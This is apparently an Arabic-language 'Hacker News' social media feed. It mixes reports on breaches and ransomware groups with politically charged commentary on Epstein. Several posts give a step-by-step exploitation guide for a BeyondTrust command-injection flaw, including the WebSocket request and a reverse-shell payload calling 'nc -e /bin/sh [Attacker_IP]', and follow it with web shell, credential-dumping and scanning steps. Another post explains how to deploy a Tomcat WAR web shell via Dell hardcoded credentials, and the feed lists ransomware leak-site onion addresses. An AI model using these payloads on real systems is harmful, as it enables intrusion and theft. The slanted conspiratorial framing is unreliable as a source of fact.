Hacker News

تعرض القطاع الصحي في نيوزيلندا لفوضى عارمة خلال اليومين الماضين بعد تعرض منصة رقمية سحابية متخصصة في إدارة الأدوية إلكترونياً ومتابعة المرضى لعملية اختراق. وقام هاكرز إثر الوصول إلى نظام "MediMap" بتعديل بيانات المرضى بشكل عشوائي وخبيث، حيث تم تغيير أسماء العديد من المرضى إلى اسم الناشط السياسي الأمريكي المقتو.ل "تشارلي كيرك" (Charlie Kirk) , وتغيير حالة مرضى أحياء إلى "متوفين" في السجلات الرقمية. تأثرت دور رعاية المسنين، مراكز الإعاقة، ودور الرعاية التلطيفية (Hospices) بشكل مباشر، حيث اختفت ملفات المرضى فجأة من شاشات الممرضين أثناء جولات توزيع الأدوية. اضطرت المنشآت الصحية المتضررة للعودة إلى نظام التسجيل الورقي اليدوي لضمان عدم إعطاء أدوية خاطئة للمرضى، بينما وضعت الشركة التطبيق في "وضع الصيانة" لإصلاح الخلل.

وأعرب رئيس الوزراء النيوزيلندي كريستوفر لوكسون عن قلقه البالغ حيال الحادثة، داعياً إلى تشديد قوانين الأمن السيبراني في البلاد، وأكدت السلطات الصحية في نيوزيلندا والشرطة أن الأولوية القصوى حالياً هي سلامة المرضى والتحقق من صحة البيانات قبل إعادة تشغيل النظام.

#HackerNews #MediMap #CharlieKirk

شنت مجموعة ShinyHunters هجمة إلكترونية استهدفت "منتجعات وين" Wynn Resorts حيث قامت باختراق أنظمة اختراق الفندق والكازينو الضخم في لاس فيغاس. وطالبت مجموعة الهاكرز بفدية قدرها 1.5 مليون دولار من عملة البيتكوين، لتفادي نشر البيانات المسروقة. ويأتي هذا في أعقاب هجمات سابقة واسعة النطاق شنتها المجموعة المرتبطة بها Scattered Spider على منتجعات القمار العملاقة في لاس فيغاس، بما في ذلك منتجعات MGM وCaesars Entertainment. حددت مجموعة ShinyHunters مهلة نهائية تنتهي هذه الليلة 23 فبراير 2026 للتواصل معها قبل تسريب البيانات التي حصلت عليها والمقدرة بـ 800 ألف سجل، أو إحداث مشاكل رقمية أخرى في أنظمة المنتجع. يعد فندق وين لاس فيغاس (Wynn Las Vegas) منتجعاً وكازينو فاخراً من فئة الـ 5 نجوم يقع في قلب لاس فيغاس ستريب. به 4843 غرفة فاخرة، وتصاميم راقية، ويضم مطاعم عالمية، ونادي ليلي، وكازينو ضخم للقمار.

ملاحظة: يمتلك دونالد ترامب منتجع وفندق فاخر (5 نجوم) يضم أجنحة وشققاً فندقية في لاس فيغاس.

#HackerNews #ShinyHunters

2 سیناریو "سرقة الھویة" (Credential Dumping): بمجرد دخول المھاجم إلى نظام BeyondTrust، ھدفه التالي لیس الجھاز نفسه، بل "خزانة الأسرار" التي یحتویھا. - الأدوات المستخدمة: Mimikatz نسخة Linux أو أدوات استخراج SQL - آلیة العمل: بما أن BeyondTrust یدیر كلمات مرور الأنظمة الأخرى، یقوم المھاجم بحقن أوامر لقراءة قاعدة بیانات الجھاز المحلي (Local DB). - یستخدم ثغرة الـ RCE للوصول إلى ملفات الإعدادات التي تحتوي على مفاتیح التشفیر.

* سبب الاختیار: أنظمة BeyondTrust ھي "بنوك كلمات مرور". الحصول على صلاحیة RCE یعني إمكانیة فك تشفیر كلمات المرور المخزنة والوصول إلى بقیة خوادم الشركة دون إثارة أي إنذار.

3 سيناريو التخفي والبقاء (Persistence via Web Shell): یھدف المھاجم ھنا لضمان العودة للجھاز حتى لو قامت الشركة بإعادة تشغیله أو تغییر كلمات المرور. - الأدوات المستخدمة: بوابة خلفیة بسیطة (Web Shell) مكتوبة بـ PHP أو Python. - آلیة العمل: یرسل المھاجم أمراً عبر الـ WebSocket یقوم بإنشاء ملف جدید في مسار الویب الخاص بالمنصة مثلاً : /usr/share/web/shell.php یحتوي ھذا الملف على سطر برمجي واحد یسمح للمھاجم بإرسال أوامر عبر المتصفح مباشرة.

* سبب الاختیار: الـ Shell Web یمنح المھاجم "رابطاً سریاً" خاصاً به. حتى لو أغلق المھاجم اتصال الـ WebSocket الأول، یمكنه العودة في أي وقت عبر طلب HTTP بسیط للمسار الذي أنشأه.

4 سیناریو "الاستطلاع الداخلي" (Internal Scanning) : استخدام جھاز BeyondTrust كـ "قفزة" للھجوم على الشبكة الداخلیة التي لا تظھر على الإنترنت. - الأدوات المستخدمة: Nmap أو سكربتات Bash مخصصة للمسح. - آلیة العمل: یقوم المھاجم بتحمیل أداة Nmap على جھاز BeyondTrust المخترق، ثم یأمره بمسح الأجھزة المجاورة له في الشبكة المحلیة (مثل أجھزة المدیر المالي أو خوادم البیانات).

* سبب الاختیار: جھاز BeyondTrust موثوق به داخل الشبكة، فعملیات المسح القادمة منه لن تبدو مشبوھة لأنظمة الأمان الداخلیة وليس كما لو كانت قادمة من عنوان IP خارجي.

#HackerNews #BeyondTrust

استكمالاً للشرح المتعلق باختراق منصات إدارة الوصول عن بُعد الخاصة بـ BeyondTrust التي تستخدمها المؤسسات والهيئات الكبرى لإدارة وصول الموردین الخارجیین والموظفین ذوي الصلاحیات العالیة إلى الأنظمة الحساسة (مثل الخوادم وقواعد البیانات)، نستعرض معكم أربع سيناريوهات متقدمة لاستغلال الثغرة الحرجة في منصة BeyondTrust بناء على طبيعة الهدف. 1 سیناریو "تجاوز جدران الحمایة" ( Reverse Shell via Metasploit ): في ھذا السیناریو، لا یكتفي المھاجم بأمر واحد، بل یرید "جلسة تحكم كاملة" تتجاوز جدران الحمایة التي تمنع الاتصالات القادمة من الخارج. - الأداة المستخدمة: Metasploit Framework (وتحديدا موديل reverse_tcp أو web_delivery) - یقوم المھاجم بتجھیز "مستمع" (Listener) على جھازه. - یرسل عبر طلب الـ WebSocket أمراً یقوم بتحمیل سكربت صغیر (Payload) من خادمه وتنفیذه في ذاكرة جھاز BeyondTrust

* سبب الاختیار: لأن الـ Reverse Shell یجعل جھاز الضحیة ھو من "یتصل" بالمھاجم، وھو ما تسمح بھ معظم جدران الحمایة (Outbound Traffic)، مما یضمن للمھاجم بقاء الاتصال مستقراً لفترة طویلة.

#HackerNews #BeyondTrust

ثغرة حقن أوامر نظام التشغیل (Injection Command OS) ناتجة عن خلل في معالجة المدخلات داخل نص برمجى (Script) یُسمى wrapper-scc-thin . یكمن الخطأ في استخدام میزة "التقییم الحسابي" (Evaluation Arithmetic) في لغة Bash بطریقة غیر آمنة، مما یسمح بتنفیذ أوامر برمجیة بدلاً من إجراء عملیات حسابیة بسیطة. تتمیز الثغرة بأنھا غیر مصادق علیھا (Unauthenticated)، أي لا یحتاج المھاجم لاسم مستخدم أو كلمة مرور. تتم عملیة الاستغلال كالتالي: -1 بدء الاتصال: یرسل المھاجم طلب HTTP عادي لترقیة الاتصال إلى بروتوكول WebSocket عبر المسار nw/ . المسار nw/ ھو نقطة نھایة (Endpoint) برمجیة مخصصة داخل أنظمة BeyondTrust لوظیفة تسمى "Native Wrapper" . ھذا المسار یمرر البیانات مباشرة إلى نص برمجي في الخلفیة یسمى wrapper-scc-thin . وبسبب ضعف البرمجة في ھذا النص، یتم تنفیذ أي أوامر خبیثة یتم إرسالھا عبر ھذا المسار بصلاحیات عالیة. -2 إرسال الحمولة (Payload): بمجرد فتح اتصال الـ WebSocket، یرسل المھاجم رسالة تحتوي على معامل یسمى remoteVersion . -3 الحقن: بدلاً من وضع رقم إصدار عادي، یضع المھاجم أمراً برمجیاً داخل صیغة حسابیة لـ Bash، مثل: . $(command_here) -4 التنفیذ: یقوم النظام المصاب بتمریر ھذه القیمة مباشرة إلى محرك Bash الذي ینفذ الأمر المدمج بصلاحیات مستخدم الخدمة (User Site)، مما یمنح المھاجم وصولاً كاملاً إلى "الأجھزة الافتراضیة" (Appliances). يحصل المھاجم على المنصات المتأثرة باستخدام أدوات مثل Shodan أو Censys للبحث عن الأجھزة التي تُظھر بصمات رقمیة خاصة بـ BeyondTrust ، أو بطلبات API مخصصة مثل info_portal_get لاستخراج قیم برمجیة (مثل company-ns-x ) تساعد في التحقق من قابلیة الجھاز للاختراق قبل البدء بالھجوم. كیف یبدأ المھاجم الاتصال؟ لا یحتاج المھاجم إلى برنامج خاص؛ یمكنه البدء باستخدام أي أداة قادرة على صیاغة طلبات Raw HTTP، وأشھرھا: ـ Burp Suite : الأداة الأكثر استخداماً من قبل مختبري الاختراق لتعدیل الطلبات یدویا.ً ـ cURL: باستخدام أوامر برمجیة بسیطة من سطر الأوامر. ـ سكربتات Python: باستخدام مكتبات مثل requests أو websockets كیف یتم ترقیة الاتصال إلى WebSocket؟ تعتمد ھذه الثغرة على بروتوكول WebSocket لأنه یسمح باتصال ثنائي الاتجاه ومستمر. یقوم المھاجم بإرسال طلب HTTP GET یتضمن رؤوس (Headers) خاصة تجبر الخادم على تغییر "لغة الحوار" من HTTP إلى WebSocket. شكل الطلب (Header) :

GET /nw HTTP/1.1
Host: [Target_IP]
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: [Random_Key]
Sec-WebSocket-Version: 13

بمجرد رد الخادم بـ Protocols Switching 101 ، یصبح الطریق مفتوحاً لإرسال "الحمولات" (Payloads) مباشرة إلى المعالج الداخلي دون قیود HTTP التقلیدیة. إرسال الحمولة (بعد الترقیة): بعد نجاح الترقیة، یرسل المھاجم رسالة بصیغة JSON عبر قناة الـ WebSocket المفتوحة:

{"remoteVersion": "$(nc -e /bin/sh [Attacker_IP] [Port])"}

ھنا یظن النظام أنه یستلم "رقم إصدار"، لكن بسبب استخدام Evaluation Arithmetic Bash بشكل غیر آمن، یقوم النظام بتنفیذ الأمر الموجود بین القوسین (...)$ فورا،ً مما یعطي المھاجم "صلاحیة الوصول الكاملة" (Shell Reverse) BeyondTrust Release Notes . #HackerNews #BeyondTrust

سنقدم اليوم شرح لاختراق منصات إدارة الوصول عن بُعد من شركة الأمن السيبراني الأمريكية BeyondTrust ، ويتعلق الأمر بـ BeyondTrust Remote Support (RS) الإصدارات 25.3.1 وماقبلها، وPrivileged Remote Access (PRA) الإصدارات 24.3.4 وماقبلها، وتستخدم المنصة شركات التكنولوجيا والخدمات الاستشارية، المؤسسات التعليمية والأكاديمية كالجامعات، شركات التأمين والبنوك، الجهات الحكومية والعسكرية كوزارة الحرب الأمريكية. شركة BeyondTrust هي شركة أمريكية عالمية رائدة في مجال الأمن السيبراني، تتخصص في تطوير برمجيات إدارة الوصول المتميز (PAM) وحماية الهويات الرقمية. توفر منصات إدارة الوصول عن بُعد تحتوي على واحدة من أخطر الثغرات الأمنیة المكتشفة مؤخرا. #HackerNews

تمتلك المجموعة منصات على "الدارك ويب" تستخدمها لنشر قائمة الضحايا والبيانات المسربة، يُعرف موقعهم باسم "Shisa Leaks" على شبكة Tor : http://longcc4fqrfcqt5lzceutylaxir6h66fp6df3oin6mvwvz6pfdbxc6qd.onion http://fuvodyoktsjdwu3mrbbrmdsmtblkxau6l7r5dygfwgzhf36mabjtcjad.onion #HackerNews #Tengu #DarkWeb

قامت مجموعة الهاكرز Tengu باختراق خوادم الشركة المغربية المتخصصة في الاستشارات المحاسبية والقانونية (Shora Advisory) للمؤسسات والشركات، حيث تم تشفير ملفاتهم، وسرقة 23.5 جيجابايت من البيانات السرية قبل إغلاق النظام.

وشملت البيانات المسروقة: -بيانات العملاء: هويات الشركات التي تتعامل معها، العقود، والأرقام الضريبية. -التقارير المالية: ميزانيات الشركات، كشوفات الرواتب، والحسابات البنكية. -أسرار تجارية: استشارات قانونية ومالية حساسة.

تستخدم مجموعة الهاكرز Tengu أسلوب "الابتزاز المزدوج" حيث تقوم بتشفير الملفات مما يجعل من المستحيل فتحها، وتطلب "فدية" مالية بالعملات الرقمية مقابل عدم نشر هذه البيانات. استهدفت مجموعة Tengu منذ ظهورها لأول مرة في 21 أكتوبر 2025 أكثر من 43 ضحية حول العالم، تركز بشكل كبير على قطاعات التصنيع، التكنولوجيا، الخدمات اللوجستية، والمحاسبة. #HackerNews #Tengu #DarkWeb

تعرضت وزارة الاقتصاد الفرنسية لخرق أمني كبير استهدف قاعدة البيانات الوطنية للحسابات البنكية المعروفة باسم FICOBA. حيث قام "هاكر" بالوصول لبيانات 1.2 مليون حساب بنكي في فرنسا وشملت:

-بيانات الحساب: أرقام الحسابات الدولية (IBAN/RIB) -نوع الحسابات (جاري، ادخار، أوراق مالية) واسم البنك. -بيانات صاحب الحساب: الاسم الكامل، تاريخ ومكان الميلاد، والعنوان. -الحالات: تواريخ فتح الحساب أو إغلاقه أو تعديله. -الأرقام الضريبية.

وصفت وزارة الاقتصاد والمديرية العامة للمالية العامة (DGFiP) المنفذ بأنه "طرف خبيث" (Malicious actor) استخدم هويات رقمية مسروقة تخص أحد الموظفين الحكوميين للوصول إلى النظام. وبدأت الوزارة بإبلاغ الأشخاص المتضررين بشكل شخصي، وتم تقديم شكوى جنائية وإبلاغ هيئة حماية البيانات الفرنسية (CNIL). #HackerNews

بما أن هذه الأنظمة داخلية (Internal) عادةً، يستخدم المهاجمون استراتيجيات محددة للوصول إليها: -البحث عن "واجهة الإدارة" (Management Interface): يعمل النظام عبر خادم ويب (Apache Tomcat). يبحث المهاجمون داخل الشبكة المخترقة عن الأجهزة التي تفتح المنفذ 443 أو 8443 وتُظهر في "عنوان الصفحة" (HTML Title) كلمات مثل RecoverPoint أو Installation Manager. -المسح الداخلي (Post-Exploitation Scouting): المهاجم لا يبدأ بهذا النظام عادةً من الإنترنت. هو يخترق جهاز موظف أولاً، ثم يستخدم أدوات مثل Advanced IP Scanner أو Nmap للبحث عن أنظمة Dell داخل الشبكة المحلية. -ثغرات التوريد (Supply Chain): أحياناً يتم اكتشاف هذه الأجهزة عبر محركات مثل Shodan إذا قام مهندس الشبكة بالخطأ بفتح واجهة الإدارة لتكون متاحة عبر الإنترنت للوصول السريع. آلية الاستغلال: -اكتشاف الباب الخلفي: اكتشف المهاجمون أن نسخة Tomcat المدمجة في نظام Dell تحتوي على مستخدم افتراضي (بصلاحيات مدير) وكلمة مرور ثابتة (Hardcoded) لا تظهر في دليل الاستخدام ولا يمكن للمسؤول تغييرها. -تسجيل الدخول: يتوجه المهاجم إلى رابط الإدارة : https://[Target_IP]:8443/manager/html) ويدخل بيانات الاعتماد المخفية. -رفع ملف الـ WAR: واجهة Tomcat تسمح برفع ملفات تسمى WAR (وهي تطبيقات Java). يرفع المهاجم ملفاً يحتوي على Web Shell (واجهة تحكم). -السيطرة المطلقة: بمجرد رفع الملف، يفتح المهاجم الرابط الخاص به في المتصفح، ليجد أمامه "سطر أوامر" (Terminal) يمتلك صلاحيات Root. -التوسع: من هذه النقطة، يبدأ المهاجم بحذف النسخ الاحتياطية (لتمهيد الطريق لهجوم فدية - Ransomware) أو سرقة البيانات الحساسة دون أن يشعر أحد. #HackerNews #CVE_2026_22769

تم الكشف عن ثغرة CVE-2026-22769 وهي ثغرة أمنية "صفرية" (Zero-day) بالغة الخطورة حصلت على التقييم الأقصى 10/10، تم الكشف عنها حديثاً في 17 فبراير 2026، وتستهدف أنظمة النسخ الاحتياطي والتعافي من الكوارث التابعة لشركة Dell. هي ثغرة بيانات اعتماد مضمنة (Hardcoded Credentials) داخل نظام Dell RecoverPoint for Virtual Machines (RP4VMs) . بعبارة أبسط، يحتوي النظام على اسم مستخدم وكلمة مرور "افتراضية ومخفية" في إعدادات خادم Apache Tomcat لا يمكن للمستخدم تغييرها بسهولة، مما يفتح باباً خلفياً دائماً للمهاجمين.

تتعلق الثغرة بأنظمة المؤسسات (Enterprise Systems) الضخمة، وليست أجهزة استهلاكية (مثل اللاب توب). تستهدف البنية التحتية لمراكز البيانات (Data Centers).

#HackerNews #CVE_2026_22769 #رمضان_مبارك

كما تعرضت القناة الخامسة (Channel 5) لهجمات لتعطيل البث الفضائي والتشويش على الترددات، وهو تكتيك تكرر لاستهداف القنوات الإخبارية الأوكرانية.

وجه المسؤولون في كييف أصابع الاتهام إلى مجموعات مرتبطة بروسيا أو مجموعات تعمل لصالحها، في هجمات مماثلة سابقة وقعت في فبراير، نُسبت العمليات لمجموعات مثل "NoName057(16)"، وهي مجموعة تنشط في تنفيذ هجمات حجب الخدمة (DDoS).

#HackerNews

تعرضت عدة مؤسسات أوكرانية حيوية، من بينها البنك الوطني الأوكراني والقناة الخامسة وبنك (A-Bank)، لسلسلة من الهجمات الإلكترونية المتزامنة في شهر فيفري/فبراير 2026. واستهدف هاكرز شركة متعاقدة خارجية (طرف ثالث) تقدم خدمات تقنية للمتجر الإلكتروني لبيع العملات النادرة (النميات) التابع للبنك الوطني الأوكراني (NBU).

تشير التقديرات الأولية إلى وصول المهاجمين إلى بيانات شخصية للعملاء تشمل الأسماء، وأرقام الهواتف، والبريد الإلكتروني، وعناوين الشحن، و تم إيقاف المتجر مؤقتاً لإجراء التحقيقات وتقييم الأضرار الناتجة عن هذا النوع من الهجمات المعروف بـ "هجوم سلاسل التوريد".

فيما واجه بنك "A-Bank" إلى جانب بنوك ومؤسسات مالية أخرى هجمات من نوع "حجب الخدمة الموزعة" (DDoS)، مما أدى إلى تعطل مؤقت في خدمات الدفع عبر الإنترنت، وتطبيقات الهاتف المحمول، وعمليات السحب من أجهزة الصراف الآلي. #HackerNews

مجموعة The Gentlemen هي مجموعة برمجيات فدية ظهرت بنشاط متزايد منذ أواخر عام 2025، وتستخدم تقنيات متطورة مثل استغلال برامج تشغيل ويندوز (Windows drivers) والتلاعب بسياسات المجموعات (GPO) لتجاوز الدفاعات الأمنية. سجلت المجموعة 128 ضحية حول العالم حتى أوائل فبراير 2026.

يأتي هذا الهجوم تزامناً مع إعلان مجلس الأمن السيبراني لحكومة الإمارات في 18 فبراير 2026 عن آلاف محاولات الاختراق يومياً، مشيراً إلى أن قطاعي النقل والخدمات المالية هما من بين الأكثر استهدافاً منذ بداية العام. #HackerNews #TheGentlemen

أعلنت مجموعة الفدية The Gentlemen عن اختراق شركتين رائدتين في قطاع النقل بدولة الإمارات العربية المتحدة. استهدف الهجوم الأول مجموعة الإمارات الوطنية (Emirates National Group - ENG) وتم رصد الاختراق في 12 فبراير 2026. تعد المجموعة مزوداً رئيسياً لحلول النقل في أبوظبي، وتدير مجموعة متنوعة تشمل سيارات الأجرة، الحافلات العامة، وخدمات الليموزين. فيما استهدف الهجوم الثاني شركة أوتوستراد لتأجير السيارات (Autostrad Rent a Car) تم الكشف عن الهجوم في 13 فبراير 2026. وهددت المجموعة بنشر بيانات حساسة للشركة ما لم يتم التفاوض معها، وتعد "أوتوستراد" من أبرز شركات تأجير السيارات في الدولة ولها نشاط واسع في دبي. #HackerNews #TheGentlemen

قريباً ... coming soon ... #HackerNews #جبهة_الإسناد_السيبراني

هلالٌ أطلَّ، ونورٌ تجلَّى، وفؤادٌ بذكر الإله تحلَّى، نبارك لكم قدوم شهر الطهر والصفاء، سائلين المولى أن يرزقكم فيه من بركاته ويعز مقامكم، أتاكم رمضان شهر يغشاكم الله فيه، فينزل فيه الرحمة، ويحط الخطايا، ويستجيب الدعاء، فأروا الله من أنفسكم خيراً. نسأل الله الذي أهلّ الهلال وأرسى الجبال أن يبلغكم رمضان وأنتم في أحسن حال، وأن يعينكم فيه على ذكره وشكره وحسن عبادته، ويرزقكم حلاوة المناجاة، وسعادة الطاعات. #HackerNews #رمضان_مبارك

المقال كامل على موقع Drop Site News لكنه يستحق القراءة لتتوضح أوجه من شخصية إبستين وعمله لصالح أجندة المنظومة الصهيونية العالمية وتغلغلها في الأوساط العلمية والمالية والسياسية : https://www.dropsitenews.com/p/jeffrey-epstein-recruited-nsa-codebreakers-genome-russia-skolkovo-bill-gates-mit

كان إبستين على تواصل مع علماء بارزين مثل "جورج تشيرش" من جامعة هارفارد، الذي حصل منه على استشارات حول تعديل الجينات وتطوير تقنيات إطالة العمر. وكشفت رسائل البريد الإلكتروني المسربة عن دعم إبستين مختبرًا بيولوجيًا في أوكرانيا لإنتاج "أطفال مُصممين وراثيًا"، بقيادة القرصان الإلكتروني برايان بيشوب. في 21 يوليو/تموز 2018، كتب إبستين إلى بيشوب: "ليس لديّ أي مشكلة في الاستثمار، المشكلة تكمن فقط فيما إذا كان يُنظر إليّ على أنني القائد". ردّ بيشوب قائلًا: "لطالما تصورتُ وجود متطلبات تتعلق بإخفاء هوية الأطفال لا يُمكننا الكشف علنًا عن هويتهم أو هوية آبائهم أو المتبرعين لهم" فيما يبدو أن الممول بالمال والمتبرع بالحيوانات المنوية هو نفسه إبستين. بعد الغزو الروسي لأوكرانيا عام 2022، بدأت وسائل الإعلام الروسية الرسمية بنشر "نظرية مؤامرة" تزعم أن الولايات المتحدة تُجري تجارب بيولوجية عسكرية سرية لخلق جنود "وحوش" في أوكرانيا. يأتي هذا الكشف ضمن سلسلة تحقيقات يجريها موقع Drop Site News حول شبكة علاقات إبستين المعقدة مع أجهزة الاستخبارات الدولية والمجتمعات العلمية والتقنية، ويسلط الضوء على أبحاث علمية خبيثة قام إبستين بتمويلها رفقة كبار شخصيات ومليارديرات مع شبكة علاقات دولية معقدة بعلماء وجامعات مرموقة ورجال سياسة. موقع Drop Site News هو منصة إعلامية استقصائية غير ربحية ومستقلة، مقرها العاصمة الأمريكية واشنطن، أسس الموقع الصحفيان الاستقصائيان البارزان جيريمي سكاهيل (Jeremy Scahill) ورايان غريم (Ryan Grim)، ويركز بشكل أساسي على النزاعات والسياسة والفساد والقضايا الاستخباراتية، مع التركيز على كشف جرائم النافذين والحروب السرية التي تشارك فيها الحكومة الأمريكية.

أمضى موقع Drop Site News الأشهر الماضية في كشف صلات إبستين بالمخابرات الأمريكية والإسر*ائيلية. و بالتعاون مع موقع Jmail لجعل ملفات إبستين الكاملة متاحة وقابلة للبحث.

#HackerNews #DropSiteNews #Jmail #EPSTEIN

في تقرير نشر حديثًا على موقع Drop Site News في 10 فيفري/فبراير 2026، كشف فيه عن مساعي الملياردير الصهيوني "جيفري إبستين" لتجنيد خبراء فك تشفير من وكالة الأمن القومي الأمريكية (NSA) ضمن مشروع غريب أطلق عليه اسم "مشروع مانهاتن الجيني" (Manhattan Project for the Genome) ، لتطبيق مفاهيم استخبارات الإشارات على الحمض النووي (DNA). هدف إبستين إلى استخدام خبرات التشفير "لاختراق" الكود الجيني البشري، معتبراً أن أساليب "استخبارات الإشارات" (Signals Intelligence) التي تستخدمها الوكالات الأمنية يمكن تطبيقها لفهم الشفرات الوراثية المعقدة.

وسعى إبستين من خلال المشروع إلى تطوير أدوات استخباراتية جديدة تهدف إلى "اعتراض" وفهم الاتصالات والرسائل المتبادلة بين الخلايا الحية داخل الكائنات الحية.

#HackerNews #DropSiteNews #Jmail #EPSTEIN